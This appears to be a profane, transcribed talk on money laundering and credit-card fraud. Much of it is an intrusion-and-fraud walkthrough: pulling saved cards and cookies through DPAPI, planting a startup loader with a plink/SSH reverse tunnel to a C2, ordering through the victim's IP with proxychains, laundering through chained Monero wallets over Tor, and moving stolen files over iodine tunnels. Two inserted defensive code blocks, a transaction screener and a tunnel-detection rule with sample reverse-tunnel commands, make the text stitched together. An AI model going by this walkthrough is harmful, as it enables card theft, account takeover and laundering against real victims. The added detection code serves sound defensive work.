Modern Cybercrime
Modern Money Laundering
OK, so let’s talk about money laundering. These days it’s kind of a moving target how cybercrime, particularly fraud like ‘carding,’ is going to work. Because of automated fraud detection—specifically AI algorithms, which also tend to implicate or accuse innocent people of fraudulent transactions—you’re going to have to use some more tricks. And no, a VPN within the region of your victim is not going to cut it. So it’s not going to work like it did in 2022 or 2021. For sure.
Just like malware, there’s a scoring system. So if you haven’t tried this: you could take multiple Sektor 7 code templates and chain them together for absolutely no logical fucking reason, except to give it a main entry point and call as many obfuscation techniques as possible, and it’ll get signatured by Windows Defender. So if you didn’t know that, there is actually a threat score: a payload accumulates a certain amount of score before it’s signatured as certifiable malware, regardless of the amount of obfuscation, encryption, or virtual machine obfuscation that you may have applied to it. This applies to Defender as well as all third-party vendors, and we’re not even getting to the EDR part. So fraud by itself is a constant moving target.
I am... well, I am not a Certified Public Accountant (CPA). I do hold a Bachelor of Science in Business Administration in Accounting. And I did outperform Beta Alpha Psi on the final exam for Accounting 402, also known as the Statement of Cash Flows, which is much harder. It’s actually the hardest part of financial accounting because you are literally tracing every single dollar—whether it be digitized, wired, or whatever—into the fraudster’s pocket.
So let’s talk not about how to do fraud, but about how to make and clean fraudulent money. A lot of people that do not have accounting degrees don’t understand—and we’re not even talking about tax accounting. Tax accounting is actually what Mr. Wolff does in The Accountant, in both Accountant movies, by the way. But let’s just talk about standard money laundering.
So structuring techniques do not really work anymore, because constantly making $3,000 transactions is also suspicious. But catching it does require things like Benford’s Law. If you have not read about Benford’s Law online...
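Benford’s Law is the first-digit test the paragraph alludes to. As an added example (not the author’s code), here is a small screening routine that runs that test alongside a structuring check over a constructed account ledger; the $10,000 threshold, the band and the hit counts are assumed tuning values, not any regulator’s.

```python
"""Account-screening checks for the two patterns named above: structuring
(runs of identical or just-under-threshold amounts) and a Benford's Law
first-digit test. Added example; ledgers and cut-offs are constructed."""
import math
from collections import Counter

# Benford's Law: P(first digit = d) = log10(1 + 1/d)
BENFORD = {d: math.log10(1 + 1 / d) for d in range(1, 10)}
CHI2_CRIT_DF8_P01 = 20.09  # chi-square critical value, 8 d.o.f., p = 0.01

def first_digit(amount):
    """Leading non-zero digit of a positive amount, via scientific notation."""
    return int(f"{amount:e}"[0])

def benford_chi_square(amounts):
    """Chi-square distance between observed first digits and Benford's Law."""
    counts = Counter(first_digit(a) for a in amounts if a > 0)
    n = sum(counts.values())
    return sum((counts[d] - n * p) ** 2 / (n * p) for d, p in BENFORD.items())

def structuring_reasons(amounts, threshold=10_000, band=0.15, min_hits=3):
    """Two structuring heuristics: repeated identical amounts (the constant
    $3,000 case) and amounts bunched just below the reporting threshold."""
    reasons = []
    amt, n = Counter(amounts).most_common(1)[0]
    if n >= min_hits:
        reasons.append(f"{n} identical transactions of {amt:,.2f}")
    near = [a for a in amounts if threshold * (1 - band) <= a < threshold]
    if len(near) >= min_hits:
        reasons.append(f"{len(near)} transactions within {band:.0%} below {threshold:,}")
    return reasons

def screen_account(amounts):
    """Combine both checks; a real pipeline needs hundreds of amounts
    before the Benford test carries statistical weight."""
    chi2 = benford_chi_square(amounts)
    return {"benford_chi2": round(chi2, 2),
            "benford_anomalous": chi2 > CHI2_CRIT_DF8_P01,
            "structuring": structuring_reasons(amounts)}

# Constructed ledgers. A geometric series spreads first digits the way
# Benford predicts; the second ledger is the structuring pattern.
NATURAL_LEDGER = [round(1.3 ** k, 2) for k in range(1, 60)]
STRUCTURED_LEDGER = [3000.0] * 6 + [9500.0, 9800.0, 9900.0, 120.5, 42.0]

if __name__ == "__main__":
    for name, ledger in (("natural", NATURAL_LEDGER), ("structured", STRUCTURED_LEDGER)):
        print(name, screen_account(ledger))
```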
But there is an endpoint through which you can launder money, and it’s actually well documented in the book Billion Dollar Whale. It covers a Malaysian man who is probably dead right now: he has never been caught, but he’s likely unable to sustain himself hiding with an Interpol Red Notice. He basically is dead, okay? There’s no way he could have bought himself a little Bond villain island. But before Interpol dropped that Red Notice, he did screw over Malaysia and the [1MDB] investment fund, which also caused a huge political upheaval, for about $10 billion total. High score: $10 billion. He defrauded Malaysia and their investors of $10 billion. He was with A-list celebrities. I thought he was an arms dealer and all that cool gossipy shit. Except he’s probably dead. So don’t be Jho Low.
But what did he do, though? How did he hide his criminal proceeds? So in Geneva, there’s a place that is literally called a Freeport. A Freeport is a mercantile arts gallery, so it does not necessarily mean just paintings. It could be hundreds of millions of dollars of jewelry from Piaget. And so you could have bought yourself—or your hypothetical wife—a necklace, but you still had it on display in the Freeport of Geneva. Now, unfortunately, you’re really only identified by something very much like a bank account number. And because of that, as long as you don’t tie the number to yourself, well, you’re not going to get caught if you actually launder your criminal proceeds into that item, which people can actually look at, but which they cannot tie to you.
It is not only your golden parachute, but it’s also, for example, a golden parachute for your lawyers. When Jho Low finally gets arrested—I’m sure he’s dead. I’m sure he’s a skeleton on some island somewhere, actually. I’m pretty sure he’s dead, okay? Because having an Interpol Red Notice is literally a ban on land, a ban in the air. And as you know, with law enforcement hounding Jho Low’s ass, he has nothing to do but die drinking seawater, because the ocean probably claimed him if an undercover cop couldn’t have grabbed his ass off a yacht or something—which is one of the last things he purchased.
But going back, Freeport Geneva is not the only Freeport in the world. There are thousands of them. Not hypothetically: factually, a free port is a legal thing. Okay? There are thousands of them. And do you need to actually see the art that you laundered? No, absolutely not. You don’t ever have to see it. So your agent acts as a proxy to funnel the money into this piece of art and hold that value, because in some way or form, when money needs to be withdrawn, this item will be sold to someone else, which can fund... I’m not kidding you... operations around the world.
This sounds like a conspiracy theory, but you should probably read and watch the Jason Bourne books and movies. Just the first three: Identity, Supremacy, and Ultimatum, because there is a shadow economy of stolen loot, in which none of these players are really that significant. People gripe about billionaires and what might very soon be a trillionaire, but they don’t understand how shadow money works.
I did see something on YouTube about authorized accounts. An authorized account is basically one where a lawyer takes mutual custody of your account. So you could be in federal prison right now, and because you called your lawyer, your lawyer is going to take money out of that authorized account to pay on your behalf to hire your huge-ass defense team. Okay? So there’s another thing.
So we started from the basics of fraud and how it’s a constantly moving target, and went to the most likely place to move millions, if not billions, of dollars: across multiple Freeports around the world and authorized accounts, which are the basic elements of big-time money laundering to move those proceeds. And how it has inspired actual fiction. I believe the Bourne series was written in the 60s or the 70s, or maybe the 80s... I don’t know, I think they’re still using rotary phones in these books. But yes. So a lot of the Shadow Economy shit... of course, you can’t fucking trace whether or not this money is really dark and from stolen and dirty money. Of course not. Not by the time it makes it to the Freeport. Not until you attribute it back to yourself.
Modern Petty Cybercrime
All right, so this is Chang Tan again. So let’s go back... let’s just teach you the basics of fraud, okay? Obviously, you don’t become a super-duper Kevin Mitnick-level carder, motherfucker, just starting off the bat. And you also don’t need real hacking skills to fucking card someone—outside of the fact that you do need to evade pattern recognition, okay? From AI-assisted fraud detection.
For that reason, people, when they buy CVV dumps, either go high or go low. Like, buy some porn, and then go real fucking high with a Monero exchange and get three wallets. Why? Because they’re going to transact maybe five bucks in porn, a thousand bucks in Monero, and then launder it through three wallets behind a VPN. Except the probability of getting caught isn’t about cops—unless they can attribute it—it’s the probability of getting caught by fraud detection, which is pretty high for the laundering part.
Well, actually, let’s go back. Let’s use host-based attacks. Okay? So let’s assume that you can open a reverse shell on your victim, and that you just stole CVV information out of their browser, right? You use the Data Protection API [DPAPI] to grab the credit cards saved in their browser on their piece of shit Windows 11 machine, which is just getting easier and easier to own. All right. You drop a hidden binary or maybe some sort of startup loader, and that startup loader creates a reverse TLS proxy, kind of an SSH-based one, or just a stupid plink command that runs an SSH reverse tunnel.
And the reason why is you want their actual public IP. And then you also need the credentials from their browser: their actual cookies, saved credentials, and session state. In other words, you’re pretty much already pinging through their machine into their banking account or their credit card in order to put in this Monero transfer.
How difficult is this? You’re thinking of the default Windows 10 and up SSH client. You can create a relatively simple [setup] with a TCP-forwarding SSH double pivot to a C2. It will be really slow, but assuming you’re using their saved credentials off their browser, adding them to your browser, using ProxyChains, and making the orders through their IP address on their desktop... not a mobile phone, but on their desktop. It should be relatively quick. On mobile devices you need relatively quick [access], since mobile device malware gets removed and banned. It’s much harder to land it these days than it was back in like the KitKat Android days.
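From the defender’s side, the startup loader plus SSH reverse tunnel described above leaves a distinctive process-creation trail. The scoring rule below is an added example (not the author’s code) run over constructed Sysmon-style events; the weights, the alert threshold and the script-host list are assumed tuning values to adjust per environment.

```python
"""Process-creation rule for the persistence-plus-reverse-tunnel pattern:
an SSH client (OpenSSH ssh.exe or PuTTY plink.exe) started with remote or
dynamic port forwarding from a Startup folder or a script host.
Added example; events, weights and threshold are constructed/assumed."""
import ntpath

SSH_CLIENTS = {"ssh.exe", "plink.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
WEIGHTS = {"remote_forward": 3, "dynamic_forward": 2, "tunnel_only": 1,
           "startup_folder": 2, "script_host_parent": 2}
ALERT_THRESHOLD = 3  # assumed; a local-forward admin session scores below it

def score_event(ev):
    """Return (score, reasons) for one event; non-SSH images score 0."""
    if ntpath.basename(ev["Image"]).lower() not in SSH_CLIENTS:
        return 0, []
    tokens = ev["CommandLine"].split()
    parent = ev.get("ParentImage", "")
    hits = {
        "remote_forward": any(t.startswith("-R") for t in tokens),  # listener on remote side
        "dynamic_forward": any(t.startswith("-D") for t in tokens),  # SOCKS proxy session
        "tunnel_only": "-N" in tokens,  # no remote command: session exists only to forward
        "startup_folder": "\\startup\\" in parent.lower(),
        "script_host_parent": ntpath.basename(parent).lower() in SCRIPT_HOSTS,
    }
    reasons = [name for name, hit in hits.items() if hit]
    return sum(WEIGHTS[r] for r in reasons), reasons

def alerts(events, threshold=ALERT_THRESHOLD):
    """Events scoring at or above the threshold, as (image, score, reasons)."""
    scored = ((ev["Image"],) + score_event(ev) for ev in events)
    return [hit for hit in scored if hit[1] >= threshold]

# Constructed events, loosely following Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:22 user@198.51.100.7",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"},
    {"Image": r"C:\Tools\plink.exe",
     "CommandLine": "plink.exe -N -R 8080:localhost:3389 deploy@203.0.113.10",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",  # admin local forward: benign
     "CommandLine": "ssh.exe -L 5432:db.internal:5432 admin@jump.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\notepad.exe", "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for image, score, reasons in alerts(SAMPLE_EVENTS):
        print(f"ALERT {score} {image}: {', '.join(reasons)}")
```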
And then you’ve got to launder the money, okay? So wallets like Feather... you’ve got a permanent address, which they highly recommend that you shouldn’t use, and they put it behind a bunch of warnings. So let’s forget about that, because you’re just doing a little one-card swipe, basically. So using your reverse proxy / reverse SSH proxy access, what you’ve got to do is use a temporary public Monero address and launder through three wallets, okay? So you’re impersonating your victim, who’s making the Monero order to your first wallet in the chain. Then you’re going to launder that money in a smaller segment, so 800 out of that $1,000 from the first wallet to the second, and then something like 600 to the third wallet. You can only spend what’s on the third wallet, because Monero is anonymous enough if you use a combination of VPN chaining and its built-in Tor.
If you have not checked this, the Feather Wallet by default has its own Tor service socket: port 9150, instead of port 9050, the default Tor SOCKS port. So that means, in other words, it carries its own Tor installation with it. So you don’t even have to install Tor, because Tor is slow as fuck. But you could customize it and point it elsewhere. And the reason why is that the default length of a Tor chain from the entrance node onward is three to five hops to be even somewhat usable. You also need to configure it to use an obfuscation bridge, and to do that, you do need either to set up your own node or find any public nodes possible, because Monero utilizes Tor to help obfuscate the transactions.
Now the only way that you can get caught now is if you fuck shit up and try to convert it back into cash for some idiotic reason. Because you can even get gift cards with Monero... I’m not kidding you. Or you can get... like, there’s websites, KYCnot.me, okay? Of course, they’re [in] collaboration with services like... um, for illicit transactions, they might sanction a wallet, but you’ve got better odds, because No KYC is what? ‘Know Your Customer.’ That doesn’t mean you’re untraceable. It’s really your OpSec, dude.
I mean, think about it. Do you know how you’re being tracked online? Did you know that if you routed a lot of your interactions on the internet without using a web browser, you’re largely just identified by the User-Agent of the application on the console that you’re using? So if you ran a cURL request to an API endpoint, all they see is the cURL User-Agent behind your VPN chain. Does that make sense?
But that’s another topic. But just for things like browser fingerprinting, you could have had a fresh install of any Linux distro you want, and from that, make sure it’s sanitized to commit your fraud. So did it take a lot of hacking skill? Maybe just to have a foolproof way to launder and extract their original card, because you do need remote access to impersonate their public IP through a reverse SSH proxy in a double pivot, but you didn’t have to open up their browser. You just had to clone their keys that were protected by the Data Protection API.
The idiot-proof method is to simply use proxychains through the compromised endpoint via a double pivot (in your hardened VM, configure the creds by browser profile, and set the proxy settings to proxychains), but... you can also use tun2socks.
And bonus stuff. You can also abuse iodine tunnels, but they’re inadequate for web browsing. It’s better to just steal critical files one by one over them.